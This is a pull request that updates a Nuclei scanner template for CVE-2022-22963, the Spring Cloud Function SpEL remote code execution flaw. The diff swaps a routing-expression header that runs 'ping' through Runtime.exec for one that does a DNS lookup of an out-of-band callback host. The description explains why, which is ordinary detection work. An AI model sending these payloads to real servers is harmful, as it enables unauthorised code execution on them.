### PR TITLE
Updated CVE-2022-22963 Check

### DIFF
--- a/cves/2022/CVE-2022-22963.yaml
+++ b/cves/2022/CVE-2022-22963.yaml
@@ -2,7 +2,7 @@ id: CVE-2022-22963
 
 info:
   name: Spring Cloud Function SPEL RCE
-  author: Mr-xn
+  author: Mr-xn,Adam Crosser
   severity: critical
   reference:
     - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f
@@ -17,7 +17,7 @@ requests:
       - |
         POST /functionRouter HTTP/1.1
         Host: {{Hostname}}
-        spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping {{interactsh-url}}")
+        spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}")
         Content-Type: application/x-www-form-urlencoded
 
         {{rand_base(8)}}


### PR DESCRIPTION
### Template / PR Information

We've updated the check for CVE-2022-22963 to use InetAddress.getByName. Previously the template used the ping command which we believe has two problems:

1. The template doesn't use ping -c so the ping command will continue running indefinitely in the background on the target server
2. It's possible the serverless environment the application is running on doesn't have ping installed. In these scenarios, Nuclei will not properly identify the vulnerability.

Since InetAddress.getByName is part of the Java runtime environment it should always be available and doesn't depend on ping. Additionally, it will only perform the lookup once and won't continue running in the background.

### Template Validation

I've validated this template locally?
- [X] YES